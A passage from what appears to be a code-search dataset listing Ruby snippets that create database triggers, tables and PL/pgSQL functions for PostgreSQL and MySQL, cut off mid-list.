"def test_0260_partition\n @@log.debug \"test_0260_partition starts\" if @@log.debug?\n assert_respond_to(@list, :partition, \"test_0260_partition_respond\")\n # Basic partition\n ta = @list.partition {|obj| obj.ndata >= 3 }\n assert_equal(2, ta.size,\"test_0260_partition_basic_01\")\n # First array: block evaluated to true\n assert_equal([@aen, @bsb], ta[0], \"test_0260_partition_basic_02\")\n # Second array: block evaluated to false\n assert_equal([@cab, @dad], ta[1], \"test_0260_partition_basic_03\")\n # Check Enumerator or Enumerable::Enumerator return, no block given\n # This form not documented by the 1.8 Pickaxe.\n new_list = @list.partition\nif RUBY_VERSION >= \"1.9\"\n result = new_list.is_a? Enumerator\n assert(result, \"test_0260_partition_enumcheck\")\nelse\n # Note: the author's version of the 1.8 Pickaxe documents this\n # as an Array, however does not document this form of code at all.\n # YMMV.\n result = new_list.is_a? Enumerable::Enumerator\n assert(result, \"test_0260_partition_enumenumcheck\")\nend\n\n @@log.debug \"test_0260_partition ends\" if @@log.debug?\n end",
"def create_range_partition_of(parent_table_name, options)\n if (options[:range_start].nil? || options[:range_end].nil?) && options[:default].blank?\n raise ArgumentError, 'range_start and range_end or default must be defined'\n end\n\n Tablature.database.create_range_partition_of(parent_table_name, options)\n end",
"def FSCKPartition(partition)\n if !Mode.test\n detected_fs = Storage.DetectFs(partition)\n if detected_fs == :ext2\n # label, %1 is partition\n out = Builtins.sformat(_(\"Checking partition %1\"), partition)\n UI.OpenDialog(Opt(:decorated), Label(out))\n\n Builtins.y2milestone(\"command: /sbin/e2fsck -y %1\", partition)\n SCR.Execute(\n path(\".target.bash\"),\n Ops.add(\"/sbin/e2fsck -y \", partition)\n )\n\n UI.CloseDialog\n end\n end\n\n nil\n end",
"def setup\n @cypher_partition = CypherPartitioner.new\n end",
"def create\n begin\n # Set the partition (/dev/sdb1), device (/dev/sdb) and alignment (optimal,minimal,none etc.) variables\n partition= resource[:name]\n device=partition[0,(partition.length-1)]\n alignment= resource[:alignment]\n\n # Now we can create the partition\n partitions = parted('-a', resource[:alignment],'--script',device,'mklabel',resource[:part_label],'mkpart', resource[:part_type],resource[:fs_type],resource[:p_begin],resource[:p_end])\n rescue Puppet::ExecutionFailure => e\n false\n end\n end",
"def partition_devices(device_list, attempt = 0, max_attempts = 3)\n return false if attempt >= max_attempts\n\n puts case attempt\n when 0 then \"Partioning devices ...\" \n else \"Retrying device partitioning (attempt #{attempt + 1}) ...\" \n end\n\n device_list.each do |device|\n puts \" * #{device}\"\n `echo 0|sfdisk #{device}`\n end\n\n puts \"Sleeping 10 seconds to reload partition tables ...\"\n sleep 10\n\n # Verify all volumes were properly partitioned\n missing_devices = []\n device_list.each do |device|\n missing_devices << device unless File.exists?(\"#{device}1\")\n end\n\n # Retry partitioning for failed volumes\n response = true\n if missing_devices.size > 0\n response = partition_devices(missing_devices, attempt + 1, max_attempts)\n end\n response\n end",
"def supports_default_partitions?\n postgresql_version >= 110_000\n end",
"def delete_table_or_partition(table, dataset: nil)\n begin\n dataset ||= @dataset\n Embulk.logger.info { \"embulk-output-bigquery: Delete table... #{@destination_project}:#{dataset}.#{table}\" }\n with_network_retry { client.delete_table(@destination_project, dataset, table) }\n rescue Google::Apis::ServerError, Google::Apis::ClientError, Google::Apis::AuthorizationError => e\n if e.status_code == 404 && /Not found:/ =~ e.message\n # ignore 'Not Found' error\n return\n end\n\n response = {status_code: e.status_code, message: e.message, error_class: e.class}\n Embulk.logger.error {\n \"embulk-output-bigquery: delete_table(#{@destination_project}, #{dataset}, #{table}), response:#{response}\"\n }\n raise Error, \"failed to delete table #{@destination_project}:#{dataset}.#{table}, response:#{response}\"\n end\n end",
"def split(table_or_region_name, split_point = nil)\n split_point_bytes = nil\n split_point_bytes = split_point.to_java_bytes unless split_point.nil?\n begin\n if split_point_bytes.nil?\n org.apache.hadoop.hbase.util.FutureUtils.get(@admin.splitRegionAsync(table_or_region_name.to_java_bytes))\n else\n org.apache.hadoop.hbase.util.FutureUtils.get(@admin.splitRegionAsync(table_or_region_name.to_java_bytes, split_point_bytes))\n end\n rescue java.lang.IllegalArgumentException, org.apache.hadoop.hbase.UnknownRegionException\n if split_point_bytes.nil?\n @admin.split(TableName.valueOf(table_or_region_name))\n else\n @admin.split(TableName.valueOf(table_or_region_name), split_point_bytes)\n end\n end\n end",
"def shared_slice(hash_)\n offset_ = @offset\n select_set_ = {}\n hash_.each do |k_, v_|\n if (ainfo_ = @structure.axis(k_))\n aindex_ = ainfo_.axis_index\n unless select_set_.include?(aindex_)\n lindex_ = ainfo_.index(v_)\n if lindex_\n offset_ += ainfo_.step * lindex_\n select_set_[aindex_] = true\n end\n end\n end\n end\n Table.new(@structure.substructure_omitting(select_set_.keys),\n :acquire => @vals, :offset => offset_, :parent => self)\n end",
"def list_swap_partitions_with_size # nelsongs\n\treturn `fdisk -l | grep /dev | grep -v Disk | awk '{if ($2==\"*\" && $6==\"82\") print $1\":\"$5;else {if ($5==\"82\") print $1\":\"$4}}' | sed s/+//g`.chomp.split\nend",
"def partitions_for(topic=nil)\n if topic.class == String && block_given?\n @j_del.java_method(:partitionsFor, [Java::java.lang.String.java_class,Java::IoVertxCore::Handler.java_class]).call(topic,(Proc.new { |ar| yield(ar.failed ? ar.cause : nil, ar.succeeded ? ar.result.to_a.map { |elt| elt != nil ? JSON.parse(elt.toJson.encode) : nil } : nil) }))\n return self\n end\n raise ArgumentError, \"Invalid arguments when calling partitions_for(#{topic})\"\n end",
"def n_partitions\n return 4 if is_qlogic_57810?\n return 2 if is_qlogic_57840?\n return 2 if is_qlogic_57800? && port.between?(1, 2)\n\n 1\n end",
"def supports_hash_partitions?\n postgresql_version >= 110_000\n end",
"def compute_table_list\n if @configuration.download_tables\n # If the list is explicitly set then use that\n tables = @configuration.download_tables.to_set\n else\n # Otherwise guess via the tables actually in the database\n tables = @adapter.guess_tables.to_set\n\n if @configuration.allow_tables\n # Only allow tables tables that we specify\n tables = tables.intersection @configuration.allow_tables\n end\n if @configuration.disallow_tables\n # Remove any tables that we don't want included\n tables = tables.difference @configuration.disallow_tables\n end\n end\n return tables\n end",
"def add_partition_to_all_lowest( tp, nb_partitions_to_add )\n\n nodes_sizes_replicas = @nodes_lists_replicas.hmap { |k,v| { k => v.size } }\n nodes_lowest = nodes_sizes_replicas.sort_by{|k,v| v}.map { |a| a[0] }\n\n nodes_lowest.each do |node|\n break if nb_partitions_to_add <= 0\n\n unless @nodes_lists_replicas[node].has_key?(tp)\n add_partition_to_node( tp, node )\n nb_partitions_to_add -= 1\n end\n end\n end",
"def prepare_tables\n table_id = 0\n seen = {}\n\n sheets.each do |sheet|\n table_id += sheet.prepare_tables(table_id + 1, seen)\n end\n end",
"def create_download_session(table_name, partition = nil)\n if partition\n url = \"projects/#{ODPS.current_project}/tables/#{table_name}?partition=#{partition}&downloads\"\n else\n url = \"projects/#{ODPS.current_project}/tables/#{table_name}?downloads\"\n end\n res = ODPS.tunnel_conn.post do |req|\n req.url url\n req.headers['Content-Type'] = 'application/json'\n end\n JSON.parse res.body, {object_class: DownloadSession}\n end",
"def available_tables(sets_of_dishes, places_per_table)\n# dishes / seats\n return sets_of_dishes / places_per_table\nend",
"def roomer_set_table_name_prefix\n self.table_name_prefix = begin\n case @roomer_scope\n when :shared\n roomer_full_table_name_prefix(Roomer.shared_schema_name)\n when :tenanted\n roomer_full_table_name_prefix(Roomer.current_tenant.try(Roomer.tenant_schema_name_column))\n else\n \"\"\n end\n end\n end",
"def from(value)\n using(partition: value)\n end",
"def create(key_hash)\n # TODO: Raise if a key missing\n @model.transaction do\n partition = partition_class.create!(key_hash)\n @keys.create_partition_tables(@model, :key_hash => key_hash)\n # TODO: Indexes\n partition\n end\n end",
"def pdf_split(input, from, to, output)\n if from == to\n range = from\n else\n range = \"#{from}-#{to}\"\n end\n\n options = [\n input.shellescape,\n 'cat',\n range,\n 'output',\n output.shellescape\n ]\n `pdftk #{options.join(' ')}`\n end"
] |
[
"0.73860645",
"0.6674913",
"0.65416634",
"0.64847636",
"0.6425398",
"0.6288182",
"0.62805045",
"0.6146301",
"0.6127633",
"0.5911713",
"0.5668943",
"0.5609965",
"0.55949575",
"0.55547947",
"0.55140114",
"0.5512072",
"0.5481167",
"0.5452773",
"0.54395694",
"0.5434945",
"0.54194564",
"0.54121757",
"0.5404254",
"0.5380966",
"0.53635025",
"0.5323602",
"0.530532",
"0.5301687",
"0.529679",
"0.5294115",
"0.5282328",
"0.52526504",
"0.5235079",
"0.5230509",
"0.51774037",
"0.5171487",
"0.5168189",
"0.5163171",
"0.51526177",
"0.5135061",
"0.5131243",
"0.5091176",
"0.50828487",
"0.5074495",
"0.5072782",
"0.50674284",
"0.5061975",
"0.5060905",
"0.50525874",
"0.5042269",
"0.50398856",
"0.5035349",
"0.50307596",
"0.50253034",
"0.500785",
"0.49955168",
"0.49709845",
"0.49568474",
"0.49477535",
"0.494664",
"0.49138093",
"0.4909805",
"0.49037796",
"0.48967257",
"0.4893215",
"0.4891594",
"0.4854779",
"0.48545203",
"0.48525864",
"0.48374066",
"0.48370507",
"0.48254922",
"0.48215213",
"0.48212186",
"0.4812171",
"0.48004237",
"0.47952354",
"0.4782623",
"0.4758631",
"0.4744929",
"0.47322842",
"0.47195885",
"0.47085118",
"0.4705296",
"0.4689477",
"0.46780062",
"0.46759015",
"0.4672095",
"0.46665323",
"0.46417904",
"0.46375835",
"0.463587",
"0.4632197",
"0.46224514",
"0.4613458",
"0.46022734",
"0.4600769",
"0.45997867",
"0.45964113",
"0.45943615"
] |
0.58224213
|
10
|
Create a trigger in the database. Arguments: table :: the table on which this trigger operates name :: the name of this trigger function :: the function to call for this trigger, which should return type trigger. opts :: options hash: :after :: Calls the trigger after execution instead of before. :args :: An argument or array of arguments to pass to the function. :each_row :: Calls the trigger for each row instead of for each statement. :events :: Can be :insert, :update, :delete, or an array of any of those. Calls the trigger whenever that type of statement is used. By default, the trigger is called for insert, update, or delete. :replace :: Replace the trigger with the same name if it already exists (PostgreSQL 14+). :when :: A filter to use for the trigger
|
def create_trigger(table, name, function, opts=OPTS)
self << create_trigger_sql(table, name, function, opts)
end
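A minimal usage sketch (illustrative, not part of the original source): the table, trigger, and function names below are hypothetical, and the example assumes DB is a connected Sequel PostgreSQL Database and that log_changes() is an existing plpgsql function declared RETURNS trigger. The SQL shape follows the create_trigger_sql helper shown among the candidates below.

# Hypothetical names; assumes DB is a Sequel PostgreSQL Database and
# log_changes() is an existing plpgsql function RETURNS trigger.
DB.create_trigger(:accounts, :accounts_audit, :log_changes,
                  events: [:insert, :update], each_row: true, after: true)
# Composes to roughly:
#   CREATE TRIGGER accounts_audit AFTER INSERT OR UPDATE ON "accounts"
#   FOR EACH ROW EXECUTE PROCEDURE log_changes()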
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_trigger_sql(table, name, function, opts=OPTS)\n events = opts[:events] ? Array(opts[:events]) : [:insert, :update, :delete]\n whence = opts[:after] ? 'AFTER' : 'BEFORE'\n if filter = opts[:when]\n raise Error, \"Trigger conditions are not supported for this database\" unless supports_trigger_conditions?\n filter = \" WHEN #{filter_expr(filter)}\"\n end\n \"CREATE #{'OR REPLACE ' if opts[:replace]}TRIGGER #{name} #{whence} #{events.map{|e| e.to_s.upcase}.join(' OR ')} ON #{quote_schema_table(table)}#{' FOR EACH ROW' if opts[:each_row]}#{filter} EXECUTE PROCEDURE #{function}(#{Array(opts[:args]).map{|a| literal(a)}.join(', ')})\"\n end",
"def add_trigger(table, events, options={})\n events += [:row] if options.delete(:row)\n events += [:before] if options.delete(:before)\n trigger = TriggerDefinition.new(0, table, options[:name], events, options[:function])\n execute trigger.to_sql_create\n end",
"def add_trigger(table, events, options={})\n events += [:row] if options.delete(:row)\n events += [:before] if options.delete(:before)\n trigger = TriggerDefinition.new(0, table, options[:name], events, options[:function])\n execute trigger.to_sql_create\n end",
"def pgt_trigger(table, trigger_name, function_name, events, definition, opts={})\n create_function(function_name, definition, :language=>:plpgsql, :returns=>:trigger, :replace=>true)\n create_trigger(table, trigger_name, function_name, :events=>events, :each_row=>true, :after=>opts[:after])\n end",
"def create_trigger name, type, table_name, *actions\n create_function \"#{name}_f\", :returns=>'trigger',:as=>'$BODY$' do\n yield\n end\n execute %{CREATE TRIGGER #{name} #{type.to_s.upcase} #{actions.map{|str|str.upcase}.join(' OR ')}\n ON \"#{table_name}\" FOR EACH ROW\n EXECUTE PROCEDURE #{name}_f();}\n end",
"def create_trigger(table_name, proc_name, event, options = {})\n\n end",
"def create_trigger(database, table)\n options = self.options(table)\n\n params = {\n :trigger_name => \"#{options[:rep_prefix]}_#{table}\",\n :table => table,\n :keys => session.send(database).primary_key_names(table),\n :log_table => \"#{options[:rep_prefix]}_pending_changes\",\n :activity_table => \"#{options[:rep_prefix]}_running_flags\",\n :key_sep => options[:key_sep],\n :exclude_rr_activity => false,\n }\n\n event_filter = options[:event_filter]\n params[:filter_conditions] = event_filter.filter_conditions if event_filter.respond_to?(:filter_conditions)\n\n session.send(database).create_replication_trigger params\n end",
"def add_trigger(opts)\n opts = opts.with_indifferent_access\n t = Trigger.new\n t.check_id = opts[:check_id]\n t.metric_id = opts[:metric_id]\n t.set_severity(opts[:severity])\n t.sign = opts[:sign].to_sym\n t.threshold = opts[:threshold]\n t.status = array(opts[:status]).map{ |s| s.upcase }\n\n t.save!\n t\n end",
"def add_function_update_timestamp(opts={})\n if has_function?(:update_timestamp)\n # if we have it, overwrite it if force is set\n if !opts[:force] \n return true \n end\n end\n func=%Q{\n BEGIN\n NEW.updated_at := now();\n RETURN NEW;\n END;\n }\n self.db.create_function :update_timestamp, func, :replace => true, :returns => 'trigger', :language => 'plpgsql'\n end",
"def create_replication_trigger(params)\n create_or_replace_replication_trigger_function params\n\n %w(insert update delete).each do |action|\n execute(<<-end_sql)\n DROP TRIGGER IF EXISTS `#{params[:trigger_name]}_#{action}`;\n end_sql\n\n # The created triggers can handle the case where the trigger procedure\n # is updated (that is: temporarily deleted and recreated) while the\n # trigger is running.\n # For that an MySQL internal exception is raised if the trigger\n # procedure cannot be found. The exception is caught by an trigger\n # internal handler. \n # The handler causes the trigger to retry calling the\n # trigger procedure several times with short breaks in between.\n\n trigger_var = action == 'delete' ? 'OLD' : 'NEW'\n if action == 'update'\n call_statement = \"CALL `#{params[:trigger_name]}`(#{key_clause('OLD', params)}, #{key_clause('NEW', params)}, '#{action[0,1].upcase}');\"\n else\n call_statement = \"CALL `#{params[:trigger_name]}`(#{key_clause(trigger_var, params)}, null, '#{action[0,1].upcase}');\"\n end\n execute(<<-end_sql)\n CREATE TRIGGER `#{params[:trigger_name]}_#{action}`\n AFTER #{action} ON `#{params[:table]}` FOR EACH ROW BEGIN\n DECLARE number_attempts INT DEFAULT 0;\n DECLARE failed INT;\n DECLARE CONTINUE HANDLER FOR 1305 BEGIN\n DO SLEEP(0.05);\n SET failed = 1;\n SET number_attempts = number_attempts + 1;\n END;\n REPEAT\n SET failed = 0;\n #{call_statement}\n UNTIL failed = 0 OR number_attempts >= 40 END REPEAT;\n END;\n end_sql\n end\n\n end",
"def create_trigger(*args)\n username, arguments = extract_username(args)\n attrs = valid_trigger_attrs(arguments)\n\n post api_url(username, 'triggers'), attrs\n end",
"def drop_trigger(table, name, opts=OPTS)\n self << drop_trigger_sql(table, name, opts)\n end",
"def createTrigger _args\n \"createTrigger _args;\" \n end",
"def trigger_definition(table_name, trigger_name, name = nil)\n raise \"Internal Error: Connection adapter did not override abstract function\"\n end",
"def create(tableName, args)\n now = Time.now \n # Pass table name and an array of Hashes. Later, test the last\n # array to see if its table options rather than column family spec.\n raise TypeError.new(\"Table name must be of type String\") \\\n unless tableName.instance_of? String\n # For now presume all the rest of the args are column family\n # hash specifications. TODO: Add table options handling.\n htd = HTableDescriptor.new(tableName)\n for arg in args\n if arg.instance_of? String\n htd.addFamily(HColumnDescriptor.new(arg))\n else\n raise TypeError.new(arg.class.to_s + \" of \" + arg.to_s + \" is not of Hash type\") \\\n unless arg.instance_of? Hash\n htd.addFamily(hcd(arg))\n end\n end\n @admin.createTable(htd)\n @formatter.header()\n @formatter.footer(now)\n end",
"def drop_trigger_sql(table, name, opts=OPTS)\n \"DROP TRIGGER#{' IF EXISTS' if opts[:if_exists]} #{name} ON #{quote_schema_table(table)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def create_table(*args, &block)\n apply_translatable_option!(:create_table, block, *args) do |definition|\n super(*args, &definition)\n end\n end",
"def create_table!(*args, &block)\n drop_table(model.table_name)\n create_table(*args, &block)\n end",
"def create_table(*args, &block)\n db.create_table(name,*args, &block)\n end",
"def create_table!(*args, &block)\n drop_table?\n create_table(*args, &block)\n end",
"def trigger\n trigger_function = \"insert_#{master_table}\"\n unless @column == 'page'\n column = \"#{@column},\"\n column_function = \"coalesce(quote_literal(NEW.#{@column}), 'NULL') || ',' ||\"\n end\n \n cmd = <<-COMMAND\n CREATE OR REPLACE FUNCTION #{trigger_function}() \n RETURNS TRIGGER AS $$ \n DECLARE\n ins_sql TEXT; \n BEGIN\n ins_sql := 'INSERT INTO daily_#{@column}_views_' || (NEW.writer_id % #{@partition_size}) ||\n '(date,article_id,#{column}count,writer_id,partition_id) \n VALUES ' ||\n '('|| quote_literal(NEW.date) || ',' || NEW.article_id ||',' ||\n \t#{column_function} \n \t\t\tNEW.count || ',' || \n \t\t\tNEW.writer_id || ',' || (NEW.writer_id % #{@partition_size}) ||')'\n ; \n EXECUTE ins_sql;\n RETURN NULL;\n END; \n $$\n LANGUAGE plpgsql;\n \n CREATE TRIGGER #{trigger_function}_trigger\n BEFORE INSERT ON #{master_table}\n FOR EACH ROW EXECUTE PROCEDURE #{trigger_function}();\n COMMAND\n @conns.each{|conn| conn.exec(cmd)}\n end",
"def triggerStatements _args\n \"triggerStatements _args;\" \n end",
"def change_table(*args, &block)\n apply_translatable_option!(:change_table, block, *args) do |definition|\n super(*args, &definition)\n end\n end",
"def create(tableName, args)\n now = Time.now \n # Pass table name and an array of Hashes. Later, test the last\n # array to see if its table options rather than column family spec.\n raise TypeError.new(\"Table name must be of type String\") \\\n unless tableName.instance_of? String\n # For now presume all the rest of the args are column family\n # hash specifications. TODO: Add table options handling.\n htd = Java::OrgApacheHadoopHbase::HTableDescriptor.new(tableName)\n for arg in args\n if arg.instance_of? String\n htd.addFamily(Java::OrgApacheHadoopHbase::HColumnDescriptor.new(makeColumnName(arg)))\n else\n raise TypeError.new(arg.class.to_s + \" of \" + arg.to_s + \" is not of Hash type\") \\\n unless arg.instance_of? Hash\n htd.addFamily(hcd(arg))\n end\n end\n @admin.createTable(htd)\n end",
"def create_table(table, **kwargs, &block)\n current_instructions << Instructions::CreateTable.new(\n **kwargs,\n table: table,\n columns_block: block,\n )\n end",
"def table(name, args = {}, &block)\n args[:base_columns] ||= columns\n table = Table.new(args, &block)\n tables << table\n singleton_class.send(:define_method, name) { return table }\n end",
"def create_table_with_versions(*args, &block)\n SchemaStatements.apply_versionable_option!(:create_table, self, *args, &block)\n end",
"def tracker_replace_trigger_function(table_name)\n create_trigger_function(TRACKER_FUNCTION_NAME, replace: true) do\n <<~SQL\n UPDATE projects SET has_external_issue_tracker = (\n EXISTS\n (\n SELECT 1\n FROM #{table_name}\n WHERE project_id = COALESCE(NEW.project_id, OLD.project_id)\n AND active = TRUE\n AND category = 'issue_tracker'\n )\n )\n WHERE projects.id = COALESCE(NEW.project_id, OLD.project_id);\n RETURN NULL;\n SQL\n end\n end",
"def report_new_table(table_name, opts = {})\n return if @tables.key?(table_name) # check if already reported before\n puts \">>>> FOUND TABLE: #{table_name}\"\n t = @tables[table_name] = OmlSqlRow.new(table_name, @db_file, self, opts)\n @on_new_stream_procs.each_value do |proc|\n proc.call(t)\n end\n end",
"def trigger(owner, event, *args); end",
"def apply_changes\n changes.each do |method, args|\n connection.send(method, new_table, *args)\n end\n end",
"def switch_trigger_mode(database, table, exclude_rr_activity)\n options = session.configuration.options\n if session.send(database).replication_trigger_exists? \"#{options[:rep_prefix]}_#{table}\", table\n params = {\n :trigger_name => \"#{options[:rep_prefix]}_#{table}\",\n :table => table,\n :keys => session.send(database).primary_key_names(table),\n :log_table => \"#{options[:rep_prefix]}_pending_changes\",\n :activity_table => \"#{options[:rep_prefix]}_running_flags\",\n :key_sep => options[:key_sep],\n :exclude_rr_activity => exclude_rr_activity,\n }\n session.send(database).create_or_replace_replication_trigger_function(params)\n end\n end",
"def create_table(table, options={})\n return send_message(SkyDB::Message::CreateTable.new(table, options))\n end",
"def generate(table_name, statement)\n alter_argument = AlterArgument.new(statement)\n dsn = DSN.new(connection_details.database, table_name)\n\n \"#{command} #{all_options} #{dsn} #{alter_argument}\"\n end",
"def create_function(name, definition, opts=OPTS)\n self << create_function_sql(name, definition, opts)\n end",
"def create_or_replace_replication_trigger_function(params)\n execute(<<-end_sql)\n DROP PROCEDURE IF EXISTS `#{params[:trigger_name]}`;\n end_sql\n \n activity_check = \"\"\n if params[:exclude_rr_activity] then\n activity_check = <<-end_sql\n DECLARE active INT;\n SELECT count(*) INTO active FROM #{params[:activity_table]};\n IF active <> 0 THEN\n LEAVE p;\n END IF;\n end_sql\n end\n\n execute(<<-end_sql)\n CREATE PROCEDURE `#{params[:trigger_name]}`(change_key varchar(2000), change_new_key varchar(2000), change_type varchar(1))\n p: BEGIN\n #{activity_check}\n INSERT INTO #{params[:log_table]}(change_table, change_key, change_new_key, change_type, change_time)\n VALUES('#{params[:table]}', change_key, change_new_key, change_type, now());\n END;\n end_sql\n \n end",
"def trigger(name, *args)\n Events.use(name, *args)\n end",
"def create_events(db: EventSourcery::Postgres.config.event_store_database,\n table_name: EventSourcery::Postgres.config.events_table_name)\n db.run 'CREATE EXTENSION IF NOT EXISTS \"uuid-ossp\"'\n db.create_table(table_name) do\n primary_key :id, type: :Bignum\n column :uuid, :uuid, null: false, default: Sequel.lit('uuid_generate_v4()')\n column :aggregate_id, :uuid, null: false\n column :type, :varchar, null: false, size: 255\n column :body, :json, null: false\n column :version, :bigint, null: false\n column :correlation_id, :uuid\n column :causation_id, :uuid\n column :created_at, :'timestamp without time zone', null: false, default: Sequel.lit(\"(now() at time zone 'utc')\")\n index [:aggregate_id, :version], unique: true\n index :uuid, unique: true\n index :type\n index :correlation_id\n index :causation_id\n index :created_at\n end\n end",
"def create!\n Upsert.logger.info \"[upsert] Creating or replacing database function #{name.inspect} on table #{buffer.parent.table_name.inspect} for selector #{selector.map(&:inspect).join(', ')} and columns #{columns.map(&:inspect).join(', ')}\"\n column_definitions = get_column_definitions\n connection.execute <<-EOS\nCREATE OR REPLACE FUNCTION #{name}(#{column_definitions.map { |c| \"#{c.quoted_input_name} #{c.sql_type} DEFAULT #{c.default || 'NULL'}\" }.join(',') }) RETURNS VOID AS\n$$\nBEGIN\n LOOP\n -- first try to update the key\n UPDATE #{quoted_table_name} SET #{column_definitions.map { |c| \"#{c.quoted_name} = #{c.quoted_input_name}\" }.join(',')}\n WHERE #{selector.map { |k| \"#{connection.quote_ident(k)} = #{connection.quote_ident([k,'input'].join('_'))}\" }.join(' AND ') };\n IF found THEN\n RETURN;\n END IF;\n -- not there, so try to insert the key\n -- if someone else inserts the same key concurrently,\n -- we could get a unique-key failure\n BEGIN\n INSERT INTO #{quoted_table_name}(#{column_definitions.map { |c| c.quoted_name }.join(',')}) VALUES (#{column_definitions.map { |c| c.quoted_input_name }.join(',')});\n RETURN;\n EXCEPTION WHEN unique_violation THEN\n -- Do nothing, and loop to try the UPDATE again.\n END;\n END LOOP;\nEND;\n$$\nLANGUAGE plpgsql;\nEOS\n end",
"def create_function_sql(name, definition, opts=OPTS)\n args = opts[:args]\n if !opts[:args].is_a?(Array) || !opts[:args].any?{|a| Array(a).length == 3 and %w'OUT INOUT'.include?(a[2].to_s)}\n returns = opts[:returns] || 'void'\n end\n language = opts[:language] || 'SQL'\n <<-END\n CREATE#{' OR REPLACE' if opts[:replace]} FUNCTION #{name}#{sql_function_args(args)}\n #{\"RETURNS #{returns}\" if returns}\n LANGUAGE #{language}\n #{opts[:behavior].to_s.upcase if opts[:behavior]}\n #{'STRICT' if opts[:strict]}\n #{'SECURITY DEFINER' if opts[:security_definer]}\n #{\"PARALLEL #{opts[:parallel].to_s.upcase}\" if opts[:parallel]}\n #{\"COST #{opts[:cost]}\" if opts[:cost]}\n #{\"ROWS #{opts[:rows]}\" if opts[:rows]}\n #{opts[:set].map{|k,v| \" SET #{k} = #{v}\"}.join(\"\\n\") if opts[:set]}\n AS #{literal(definition.to_s)}#{\", #{literal(opts[:link_symbol].to_s)}\" if opts[:link_symbol]}\n END\n end",
"def event(event, opts={}, &block)\r\n tt = read_inheritable_attribute(:transition_table)\r\n \r\n et = read_inheritable_attribute(:event_table)\r\n e = et[event.to_sym] = SupportingClasses::Event.new(event, opts, tt, &block)\r\n define_method(\"#{event.to_s}!\") { e.fire(self) }\r\n end",
"def alter(table_name_str, wait = true, *args)\n # Table name should be a string\n raise(ArgumentError, 'Table name must be of type String') unless\n table_name_str.is_a?(String)\n\n # Table should exist\n raise(ArgumentError, \"Can't find a table: #{table_name_str}\") unless exists?(table_name_str)\n\n # There should be at least one argument\n raise(ArgumentError, 'There should be at least one argument but the table name') if args.empty?\n\n table_name = TableName.valueOf(table_name_str)\n\n # Get table descriptor\n tdb = TableDescriptorBuilder.newBuilder(@admin.getDescriptor(table_name))\n hasTableUpdate = false\n\n # Process all args\n args.each do |arg|\n # Normalize args to support column name only alter specs\n arg = { NAME => arg } if arg.is_a?(String)\n\n # Normalize args to support shortcut delete syntax\n arg = { METHOD => 'delete', NAME => arg['delete'] } if arg['delete']\n\n # There are 3 possible options.\n # 1) Column family spec. Distinguished by having a NAME and no METHOD.\n method = arg.delete(METHOD)\n if method.nil? && arg.key?(NAME)\n descriptor = cfd(arg, tdb)\n column_name = descriptor.getNameAsString\n\n # If column already exist, then try to alter it. Create otherwise.\n if tdb.build.hasColumnFamily(column_name.to_java_bytes)\n tdb.modifyColumnFamily(descriptor)\n else\n tdb.setColumnFamily(descriptor)\n end\n hasTableUpdate = true\n next\n end\n\n # 2) Method other than table_att, with some args.\n name = arg.delete(NAME)\n if !method.nil? && method != 'table_att'\n # Delete column family\n if method == 'delete'\n raise(ArgumentError, 'NAME parameter missing for delete method') unless name\n tdb.removeColumnFamily(name.to_java_bytes)\n hasTableUpdate = true\n # Unset table attributes\n elsif method == 'table_att_unset'\n raise(ArgumentError, 'NAME parameter missing for table_att_unset method') unless name\n if name.is_a?(Array)\n name.each do |key|\n if tdb.build.getValue(key).nil?\n raise ArgumentError, \"Could not find attribute: #{key}\"\n end\n tdb.removeValue(key)\n end\n else\n if tdb.build.getValue(name).nil?\n raise ArgumentError, \"Could not find attribute: #{name}\"\n end\n tdb.removeValue(name)\n end\n hasTableUpdate = true\n elsif method == 'table_remove_coprocessor'\n classname = arg.delete(CLASSNAME)\n raise(ArgumentError, 'CLASSNAME parameter missing for table_remove_coprocessor method') unless classname\n if classname.is_a?(Array)\n classname.each do |key|\n tdb.removeCoprocessor(key)\n end\n else\n tdb.removeCoprocessor(classname)\n end\n hasTableUpdate = true\n # Unset table configuration\n elsif method == 'table_conf_unset'\n raise(ArgumentError, 'NAME parameter missing for table_conf_unset method') unless name\n if name.is_a?(Array)\n name.each do |key|\n if tdb.build.getValue(key).nil?\n raise ArgumentError, \"Could not find configuration: #{key}\"\n end\n tdb.removeValue(key)\n end\n else\n if tdb.build.getValue(name).nil?\n raise ArgumentError, \"Could not find configuration: #{name}\"\n end\n tdb.removeValue(name)\n end\n hasTableUpdate = true\n # Unknown method\n else\n raise ArgumentError, \"Unknown method: #{method}\"\n end\n\n arg.each_key do |unknown_key|\n puts(format('Unknown argument ignored: %s', unknown_key))\n end\n\n next\n end\n\n # 3) Some args for the table, optionally with METHOD => table_att (deprecated)\n update_tdb_from_arg(tdb, arg)\n\n # set a coprocessor attribute\n valid_coproc_keys = []\n next unless arg.is_a?(Hash)\n arg.each do |key, value|\n k = String.new(key) # prepare to strip\n k.strip!\n\n # Uses insensitive 
matching so we can accept lowercase 'coprocessor' for compatibility\n next unless k =~ /#{COPROCESSOR}/i\n if value.is_a? String\n # Specifying a coprocessor by this \"spec string\" is here for backwards compatibility\n v = String.new value\n v.strip!\n cp = coprocessor_descriptor_from_spec_str v\n elsif value.is_a? Hash\n cp = coprocessor_descriptor_from_hash value\n else\n raise ArgumentError.new 'coprocessor must be provided as a String or Hash'\n end\n tdb.setCoprocessor cp\n valid_coproc_keys << key\n end\n\n valid_coproc_keys.each do |key|\n arg.delete(key)\n end\n\n hasTableUpdate = true\n\n arg.each_key do |unknown_key|\n puts(format('Unknown argument ignored: %s', unknown_key))\n end\n\n next\n end\n\n # Bulk apply all table modifications.\n if hasTableUpdate\n future = @admin.modifyTableAsync(tdb.build)\n\n if wait == true\n puts 'Updating all regions with the new schema...'\n future.get\n end\n end\n end",
"def change_table_with_versions(*args, &block)\n SchemaStatements.apply_versionable_option!(:change_table, self, *args, &block)\n end",
"def create_event options\n row=table.add calculate_value(expression,options)\n super options.merge row: row\n end",
